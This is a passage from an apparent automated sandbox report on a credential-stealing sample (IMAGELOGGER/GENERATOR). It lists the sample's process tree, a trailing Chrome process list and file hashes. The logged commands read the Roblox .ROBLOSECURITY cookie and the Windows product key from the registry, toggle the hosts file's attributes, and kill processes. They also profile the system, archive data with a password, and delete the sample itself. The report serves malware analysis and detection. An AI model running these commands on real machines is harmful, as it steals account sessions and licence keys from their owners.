QAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                              5⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:5568
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f1zooanh\f1zooanh.cmdline"
                                                                                                6⤵
                                                                                                  PID:2832
                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BB1.tmp" "c:\Users\Admin\AppData\Local\Temp\f1zooanh\CSCBB3D266D33274345A7233A19A4552E68.TMP"
                                                                                                    7⤵
                                                                                                      PID:3416
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                4⤵
                                                                                                  PID:5720
                                                                                                  • C:\Windows\system32\tree.com
                                                                                                    tree /A /F
                                                                                                    5⤵
                                                                                                      PID:5952
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                    4⤵
                                                                                                      PID:5760
                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                        5⤵
                                                                                                        • Drops file in Drivers directory
                                                                                                        • Views/modifies file attributes
                                                                                                        PID:5924
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                      4⤵
                                                                                                        PID:5972
                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                          attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                          5⤵
                                                                                                          • Drops file in Drivers directory
                                                                                                          • Views/modifies file attributes
                                                                                                          PID:6096
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                        4⤵
                                                                                                          PID:6024
                                                                                                          • C:\Windows\system32\tree.com
                                                                                                            tree /A /F
                                                                                                            5⤵
                                                                                                              PID:6120
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                            4⤵
                                                                                                              PID:1836
                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                tasklist /FO LIST
                                                                                                                5⤵
                                                                                                                • Enumerates processes with tasklist
                                                                                                                PID:1512
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                              4⤵
                                                                                                                PID:5260
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  5⤵
                                                                                                                    PID:2684
                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                    tree /A /F
                                                                                                                    5⤵
                                                                                                                      PID:1488
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                    4⤵
                                                                                                                      PID:5160
                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                        tree /A /F
                                                                                                                        5⤵
                                                                                                                          PID:5280
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                        4⤵
                                                                                                                          PID:5316
                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                            tree /A /F
                                                                                                                            5⤵
                                                                                                                              PID:5584
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4228"
                                                                                                                            4⤵
                                                                                                                              PID:5424
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /F /PID 4228
                                                                                                                                5⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:2948
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4228"
                                                                                                                              4⤵
                                                                                                                                PID:5488
                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                  taskkill /F /PID 4228
                                                                                                                                  5⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:3896
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4792"
                                                                                                                                4⤵
                                                                                                                                  PID:4588
                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                    taskkill /F /PID 4792
                                                                                                                                    5⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:5868
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4196"
                                                                                                                                  4⤵
                                                                                                                                    PID:5772
                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                      taskkill /F /PID 4196
                                                                                                                                      5⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:336
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4792"
                                                                                                                                    4⤵
                                                                                                                                      PID:5664
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        taskkill /F /PID 4792
                                                                                                                                        5⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:6128
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4036"
                                                                                                                                      4⤵
                                                                                                                                        PID:6016
                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                          taskkill /F /PID 4036
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:6084
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4196"
                                                                                                                                        4⤵
                                                                                                                                          PID:6036
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            5⤵
                                                                                                                                              PID:6120
                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                              taskkill /F /PID 4196
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:6080
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4036"
                                                                                                                                            4⤵
                                                                                                                                              PID:4736
                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                taskkill /F /PID 4036
                                                                                                                                                5⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:3464
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 428"
                                                                                                                                              4⤵
                                                                                                                                                PID:5548
                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                  taskkill /F /PID 428
                                                                                                                                                  5⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:2116
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 428"
                                                                                                                                                4⤵
                                                                                                                                                  PID:1876
                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                    taskkill /F /PID 428
                                                                                                                                                    5⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:5208
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4012"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:852
                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                      taskkill /F /PID 4012
                                                                                                                                                      5⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:1344
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4012"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5252
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        5⤵
                                                                                                                                                          PID:2832
                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                          taskkill /F /PID 4012
                                                                                                                                                          5⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:5324
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4484"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5276
                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                            taskkill /F /PID 4484
                                                                                                                                                            5⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:3428
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4484"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1496
                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                              taskkill /F /PID 4484
                                                                                                                                                              5⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:5908
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5504
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                5⤵
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:4776
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4764
                                                                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                                                                  getmac
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4816
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4524
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:1932
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26722\rar.exe a -r -hp"trust" "C:\Users\Admin\AppData\Local\Temp\idVcA.zip" *"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3668
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5760
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI26722\rar.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI26722\rar.exe a -r -hp"trust" "C:\Users\Admin\AppData\Local\Temp\idVcA.zip" *
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5944
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5724
                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                            wmic os get Caption
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:5868
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5840
                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                wmic computersystem get totalphysicalmemory
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5844
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:5636
                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                    wmic csproduct get uuid
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3612
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:6040
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:5828
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6084
                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                          wmic path win32_VideoController get name
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Detects videocard installed
                                                                                                                                                                                          PID:5528
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:968
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:3620
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGERA.exe""
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:2332
                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                              ping localhost -n 3
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                              PID:5492
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGER.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\IMAGELOGGER.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:2680
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\GENERATOR.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\GENERATOR.exe"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:2264
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:5644
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe79ecab58,0x7ffe79ecab68,0x7ffe79ecab78
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5544
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:2
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1092
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:8
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:1692
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2204 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:8
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3784
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2456
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2460
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4204 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3720
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4368 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:8
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4624
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4512 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:8
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2872
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3984 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5088
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:8
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1484
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3804 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:8
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:5804
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4496 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:8
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:6000
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3368 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:1
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3464
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2692 --field-trial-handle=1788,i,11326810275093310581,206612257204283227,131072 /prefetch:2
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    PID:4064
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4012

                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    40B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    9a3b62aac03b5c3df7a45492fd4296a8

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    7986bd88e4f156d2826edbd9217d39b7bc601c0d

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    7b0f82db3f65b358c42f24eb6cf480c73fdde593b7381257c35d8342939b6d15

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    64fbc53e8b7dd059955b66650d7b5db476f8086503247cc5f929b25ece6ad6a03f7e4a7444c5bf606d21b7c115bca1cf6ab01fafa979408adf36504f66a7b07e

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    201KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    f5bc40498b73af1cc23f51ea60130601

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    44de2c184cf4e0a2b9106756fc860df9ed584666

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    c11b6273f0c5f039dfef3bf5d8efe45a2ecf65966e89eeb1a6c2277d712ae9fb

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    9c993ef3ec746cbe937bbe32735410257f94ceb6f734d75e401fb78dc2e3ab3b7d83c086086f0e1230dc8dafd5328f9af664341eb781c72e67c4d84d1f6c1112

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000017

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    24KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    f782de7f00a1e90076b6b77a05fa908a

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    4ed15dad2baa61e9627bf2179aa7b9188ce7d4e1

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    d0b96d69ee7f70f041f493592de3805bfb338e50babdee522fcf145cb98fc968

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    78ec6f253e876d8f0812a9570f6079903d63dd000458f4f517ec44c8dd7468e51703ea17ecce2658d9ea1fdb5246c8db5887a16be80115bbf71fe53f439d8766

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    fb9833497929c28aea3f1c6ed48b3d5d

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    4f834b3ec2802ce512877332c1ad1d4599770c6d

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    601b6910f74d97e2b1a08bfce74deb78f25cf25ed07dbd4bc21d51712fc47799

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    0a460edd6e36b28849f481c10ab36e0a4422adbda84c4c2560bd369e843b39ea6d0624f4b2dc1fe08dff8cbb696177414526b7c376e51fbb009841e66bd775c7

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    3e74135336d4f4a96ca7540d1b8e0703

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    e6ba54c7eee3fa92de76a23d9739b87edfd39ad6

                                                                                                                                                                                                                    SHA256

